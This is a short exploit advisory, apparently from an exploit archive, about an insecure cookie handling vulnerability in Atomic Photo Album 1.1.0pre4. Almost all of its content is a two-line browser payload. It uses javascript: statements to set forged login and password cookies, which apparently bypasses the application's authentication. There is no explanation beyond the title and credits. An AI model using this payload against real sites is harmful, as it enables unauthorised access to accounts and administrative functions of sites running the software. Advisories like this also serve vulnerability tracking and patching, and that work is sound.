id: 3767
date: 09/25/2008
title: Atomic Photo Album 1.1.0pre4 Insecure Cookie Handling Vulnerability
author: Stack
cves: 

===================================================================
Atomic Photo Album 1.1.0pre4 Insecure Cookie Handling Vulnerability
===================================================================


###############################################################################################
[+] Atomic Photo Album 1.1.0pre4 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack              
[+] Greetz : All my freind             
################################################################################################
javascript:document.cookie = "apa_cookie_login=foo; path=/;";
javascript:document.cookie = "apa_cookie_password=bar; path=/;";



#  0day.today [2023-03-27]  #